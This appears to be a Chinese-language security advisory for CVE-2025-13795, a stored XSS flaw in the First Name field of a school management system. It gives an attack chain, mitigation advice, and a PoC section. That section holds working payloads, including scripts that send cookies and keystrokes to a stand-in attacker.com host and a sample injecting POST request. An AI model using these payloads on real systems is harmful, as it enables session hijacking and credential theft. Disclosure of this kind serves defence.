CVE-2025-13795 codingWithElias School Management System XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13795

漏洞类型

跨站脚本攻击（XSS）

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

codingWithElias School Management System

漏洞概述

CVE-2025-13795是codingWithElias School Management System中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于学生信息编辑页面的First Name参数中，攻击者可以通过构造恶意脚本代码并提交到服务器，当其他用户访问相关页面时，恶意脚本将在其浏览器中执行。漏洞影响范围包括该系统f1ac334bfd89ae9067cc14dea12ec6ff3f078c01及之前版本。由于该系统采用滚动发布模式，具体受影响版本号未明确提供。攻击者利用此漏洞可以窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或修改页面显示内容。虽然CVSS评分较低（2.4），但在实际攻击场景中，XSS漏洞常被用于进一步的网络钓鱼和会话劫持，可能造成严重的安全后果。厂商在早期已收到漏洞报告但未做出任何回应。

技术细节

该漏洞为存储型XSS（Stored XSS），存在于student-view.php文件的学生信息编辑功能中。攻击者通过在First Name参数中注入恶意JavaScript代码（如<script>alert(document.cookie)</script>），该代码被存储到数据库中。当管理员或其他用户访问学生信息页面时，服务器从数据库读取并输出该数据时未进行适当的输入验证和输出编码，导致恶意脚本在用户浏览器中执行。由于系统未对用户输入进行严格的HTML实体转义，特殊字符被直接渲染，从而触发XSS攻击。攻击者可以利用此漏洞窃取受害者的会话令牌、凭据或其他敏感信息，甚至可以通过社会工程学手段诱导用户执行恶意操作。该漏洞需要高权限用户（PR:H）进行触发，且需要用户交互（UI:R），但攻击代码已被公开披露，存在被恶意利用的风险。

攻击链分析

STEP 1

步骤1

攻击者识别目标系统：codingWithElias School Management System，版本在f1ac334bfd89ae9067cc14dea12ec6ff3f078c01及之前

STEP 2

步骤2

攻击者访问/student-view.php的学生信息编辑页面

STEP 3

步骤3

攻击者在First Name参数中注入恶意JavaScript代码，如<script>alert(document.cookie)</script>

STEP 4

步骤4

服务器未对输入进行适当过滤和转义，将恶意脚本存储到数据库

STEP 5

步骤5

当管理员或其他用户访问包含该学生信息的页面时，服务器从数据库读取数据并直接输出到页面

STEP 6

步骤6

用户浏览器解析HTML时执行注入的恶意脚本，攻击者成功窃取Cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-13795 PoC: Stored XSS in First Name field -->
<!-- Target: codingWithElias School Management System /student-view.php -->
<!-- Affected Component: Edit Student Info Page -->

<!-- Basic XSS Payload -->
<script>alert(document.cookie)</script>

<!-- Cookie Theft Payload -->
<script>
  fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie));
</script>

<!-- Keylogger Payload -->
<script>
  document.onkeypress = function(e) {
    fetch('https://attacker.com/log?key=' + e.key);
  }
</script>

<!-- Attack Steps: -->
<!-- 1. Navigate to: /student-view.php (Edit Student Info Page) -->
<!-- 2. Locate the First Name input field -->
<!-- 3. Inject the XSS payload in the First Name parameter -->
<!-- 4. Submit the form to save the malicious data -->
<!-- 5. When any user views the student information, the XSS will execute -->

<!-- Example HTTP POST Request: -->
<!-- POST /student-view.php HTTP/1.1 -->
<!-- Host: target.com -->
<!-- Content-Type: application/x-www-form-urlencoded -->
<!-- -->
<!-- first_name=<script>alert(document.cookie)</script>&last_name=Test&action=update -->

影响范围

codingWithElias School Management System <= f1ac334bfd89ae9067cc14dea12ec6ff3f078c01

防御指南

临时缓解措施

在供应商提供官方修复之前，可采取以下临时缓解措施：1）禁用学生信息编辑功能或限制该功能仅在受控环境中使用；2）部署Web应用防火墙规则拦截包含<script>标签和JavaScript事件处理器的请求；3）对所有用户输入实施严格的输入过滤，移除或转义<、>、'、"等特殊字符；4）启用HTTPOnly和Secure标志保护会话Cookie；5）实施Content-Security-Policy限制脚本来源；6）监控日志中的可疑XSS攻击特征；7）限制学生信息页面的访问权限，仅授权必要人员访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13795
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13795
3 Details https://www.cvedetails.com/cve/CVE-2025-13795/
4 VulDB https://vuldb.com/cve/CVE-2025-13795
5 Link https://github.com/Al1ce258/MY-CVE-REPORTS/blob/main/school-management-system.md
6 Link https://vuldb.com/?ctiid.333806
7 Link https://vuldb.com/?id.333806
8 Link https://vuldb.com/?submit.691836